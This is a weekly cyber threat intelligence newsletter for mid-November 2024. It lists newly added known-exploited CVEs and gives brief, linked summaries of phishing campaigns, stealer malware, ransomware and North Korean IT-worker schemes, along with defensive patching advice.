Cyber Threat Weekly – #52
The week of November 11th through November 17th, 332 cyber news articles were reviewed. Quite a bit of cyber threat trend and adversarial behavior news to share. Let’s start with increasing use of SVG attachments in email phishing.
An undocumented Fortinet FortiClient bug used to steal VPN credentials. Palo Alto updates its firewall management interface advisory. WezRat malware deployed by Iranian threat actors. Snail mail is used to deliver malware.
Threat actor deploying PXA Stealer via phishing campaign. PostgreSQL bug allows environment variable exploitation. North Korean IT workers are changing tactics. Two more critical bugs in Palo Alto’s Expedition migration tool.
New ‘Glove Stealer’ .NET malware. Legit infrastructure continues to be abused by threat actors, hijacked domains. Strela Stealer malware being served via phishing email. Researchers report on the State of Cloud Ransomware in 2024.
Attackers use novel macOS extended file attributes technique. Data aggregator leaks 122 million records. A deep dive into the TTPs of North Korean remote work scheme. The MOVEit vulnerability rears its head again.
LodaRAT, old malware with new tricks. Researchers analyze a multi-stage PowerShell infection chain. Another new-ish ransomware gang to keep an eye on, Ymir.
Broken Record Alert: Please patch N-day bugs!!!
Known exploited software flaws are one of the top 5 initial access vectors. We continue to share n-day vulnerabilities being actively exploited. You can prioritize starting with the CISA known exploited vulnerability (KEV) catalog.
A close #2 priority is flaws with weaponized proof of concept (PoC) code available. Exploit chances are higher with weaponized PoC code available. If you do nothing else with patching, have an emergency 24-to-48-hour patching process for exploited and weaponized PoC code available vulnerabilities.
You should consider what is exposed to the Internet. Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices exposed to the Internet.
CISA Known Exploited Vulnerabilities for November 4th to November 10th:
CVE-2021-26086 – Atlassian Jira Server and Data Center Path Traversal Vulnerability:
Allows a remote attacker to read particular files in the /WEB-INF/web.xml endpoint.
CVE-2014-2120 – Cisco Adaptive Security Appliance (ASA) Cross-Site Scripting (XSS) Vulnerability:
Allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
CVE-2021-41277 – Metabase GeoJSON API Local File Inclusion Vulnerability:
Metabase contains a local file inclusion vulnerability in the custom map support in the API to read GeoJSON formatted data.
CVE-2024-43451 – Microsoft Windows NTLMv2 Hash Disclosure Spoofing Vulnerability:
Could result in disclosing a user's NTLMv2 hash to an attacker via a file open operation. The attacker could then leverage this hash to impersonate that user.
CVE-2024-49039 – Microsoft Windows Task Scheduler Privilege Escalation Vulnerability:
Could allow an attacker-provided, local application to escalate privileges outside of its AppContainer, and access privileged RPC functions.
CVE-2024-9465 – Palo Alto Networks Expedition SQL Injection Vulnerability:
Allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.
CVE-2024-9463 – Palo Alto Networks Expedition OS Command Injection Vulnerability:
Allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.
CVE-2024-9474 – Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability:
Allows for privilege escalation through the web-based management interface for several PAN products, including firewalls and VPN concentrators.
CVE-2024-0012 – Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability:
An authentication bypass vulnerability in the web-based management interface for several PAN-OS products, including firewalls and VPN concentrators.
CVE-2024-1212 – Progress Kemp LoadMaster OS Command Injection Vulnerability:
Allows an unauthenticated, remote attacker to access the system through the LoadMaster management interface, enabling arbitrary system command execution.
Phishing with Scalable Vector Graphics (SVG) Attachments
While not new, SVG attachments are becoming more popular. Theat actors can evade defenses and create login forms within the graphic for credential theft. Like most things that work, we should expect to see commoditization and greater use.
Fortinet FortiClient Bug Abused to Steal VPN Credentials
A threat actor is using a post-exploitation framework called DEEPDATA to abuse a zero-day bug to steal VPN credentials. Researchers share details of a few malware families believed to be maintained by the threat actor.
https://thehackernews.com/2024/11/warning-deepdata-malware-exploiting.html
Palo Alto Firewalls Management Interface Zero-day Bug
The company has released a few IP addresses and is again urging customers to secure the management interfaces of their firewalls. The principle of least privilege should be applied to critical devices such as firewalls management interfaces.
https://thehackernews.com/2024/11/pan-os-firewall-vulnerability-under.html
https://security.paloaltonetworks.com/PAN-SA-2024-0015
Iranian State Sponsored Actors Deploy WezRat
Researchers observed a new campaign targeting Israeli organizations. Keep an eye out for phishing lures similar to the one used in this campaign. Iran is no slouch when it comes to attack operations.
https://thehackernews.com/2024/11/iranian-hackers-deploy-wezrat-malware.html
https://research.checkpoint.com/2024/wezrat-malware-deep-dive/
Malicious QR Codes Delivered via Snail Mail
This is an interesting one, going old school-ish to deliver malicious QR codes that ultimately lead to Coper, a banking trojan. Pay attention to the lure, it can be used and twisted in several different ways.
https://www.malwarebytes.com/blog/news/2024/11/malicious-qr-codes-sent-in-the-mail-deliver-malware
PXA Stealer Deployed via Phishing Campaign
Currently targeting Europe and Asia, but that can change at any time. Researchers observed the attacker selling Facebook and Zalo account credentials as well as SIM cards. Stolen Facebook cookies are used to interact with Facebook Ads Manager and Graph API.
https://thehackernews.com/2024/11/vietnamese-hacker-group-deploys-new-pxa.html
https://blog.talosintelligence.com/new-pxa-stealer/
Researchers Discover PostgreSQL PL / Perl Bug
An unprivileged database user can modify sensitive environment variables leading to arbitrary code execution. Tracked as CVE-2024-10979 and rated an 8.8 CVSS score. Additional findings will be shared at a later date.
https://thehackernews.com/2024/11/high-severity-flaw-in-postgresql-allows.html
https://www.varonis.com/blog/cve-postgresql-pl/perl
https://www.postgresql.org/support/security/CVE-2024-10979/
Researchers Dig into North Korean IT Worker Activities
Initially gaining employment to sustain their nation’s illicit activities, they are getting more aggressive. Participating in insider threats and malware attacks. Several researchers shared updated tactics, techniques, and procedures for the contagious interview campaign. Imitating video conference websites to lure targets into installing BeaverTail malware.
https://unit42.paloaltonetworks.com/fake-north-korean-it-worker-activity-cluster/
Two New Palo Alto Expedition Flaws Actively Exploited
The migration tool is under attack again. Although not much data has been shared as of yet. These flaws are unauthenticated command injection (CVE-2024-9463) and SQL injection (CVE-2024-9465) vulnerabilities.
https://security.paloaltonetworks.com/PAN-SA-2024-0010
Researchers Discover New ‘Glove Stealer’ .NET Malware
This malware appears to be in its early stages of development. Capable of stealing extracting cookies, cryptocurrency wallets, 2FA tokens, and more from FireFox and Chromium based browsers.
https://www.gendigital.com/blog/insights/research/glove-stealer
Hijacked Domains Fuel Threat Actors Attack Campaigns
There is no end to threat actors abusing legit infrastructure. Researchers share an attack technique called Sitting Ducks. Very difficult for security tools to detect, just like residential routers. Abused by several threat actors for various purposes.
https://thehackernews.com/2024/11/experts-uncover-70000-hijacked-domains.html
New Strela Stealer Phishing Campaign Abuses Stolen Emails
A change in tactics from generic fake invoices to stolen emails from real entities. While mainly targeting Europe currently, that can change quickly. The Strela Stealer malware itself has changed little over the past two years.
https://therecord.media/cybercriminals-taget-spain-germany-ukraine-strela-stealer-malware
https://securityintelligence.com/x-force/strela-stealer-todays-invoice-tomorrows-phish/
Researchers share the State of Cloud Ransomware in 2024
Common attacks today include targeting cloud storage, using cloud services for data exfiltration, and web application ransom attacks. Cloud infrastructure is increasingly being targeted by threat actors, both cybercriminals and nation state backed.
https://www.sentinelone.com/blog/the-state-of-cloud-ransomware-in-2024/
RustyAttr Trojan Abuses macOS Extended Attributes for Deployment
A novel technique has been discovered to install a new trojan on macOS. Malicious code is hidden in custom file attributes to evade defenses. macOS extended attributes contain hidden metadata that is not directly visible with Finder or the terminal.
https://www.group-ib.com/blog/stealthy-attributes-of-apt-lazarus/
Data Aggregator Leaks 122 million Records
DemandScience is the organization that didn’t turn off a system decommissioned two years ago. Formerly known as Pure Incubation, they admitted this is data from their system. The good news its business data without passwords.
https://www.troyhunt.com/inside-the-demandscience-by-pure-incubation-data-breach/
North Korean Fraudulent Remote Work Scheme
Researchers dig into the behavior of North Koreans infiltrating organizations worldwide. Based on public information, a strategy is shared to detect the operatives. In addition to violating sanctions, these workers pose a threat to organizations through data exfiltration and extortion.
https://unit42.paloaltonetworks.com/north-korean-it-workers/
Dark Web Posts Bring Back MOVEit Leak Worries
A threat actor released employee data from 25 companies on a cybercriminal forum and is claiming 1,000 more releases.
https://therecord.media/delta-amazon-vendor-breach-confirmed
New LodaRAT Campaign Observed
While an older malware, it still works very well. A few updates have been observed, but overall remains largely the same. Researchers provide victimology and technical analysis.
https://www.rapid7.com/blog/post/2024/11/12/lodarat-established-malware-new-victim-patterns/
A multi-stage PowerShell Infection Chain Analyzed
Researchers dig into a sophisticated attack chain that starts with a LNK file.
https://cyble.com/blog/dissecting-a-multi-stage-powershell-campaign-using-chisel/
New-Ish Ymir Ransomware Strain Runs In-Memory
It appears Ymir ransomware is working with RustyStealer threat actors.
https://securelist.com/new-ymir-ransomware-found-in-colombia/114493/
31337 InfoSec - Cyber Threat Weekly - Derek Krein Newsletter
Join the newsletter to receive the latest updates in your inbox.
Comments
Sign in to join the conversation.
Just enter your email below to receive a login link.
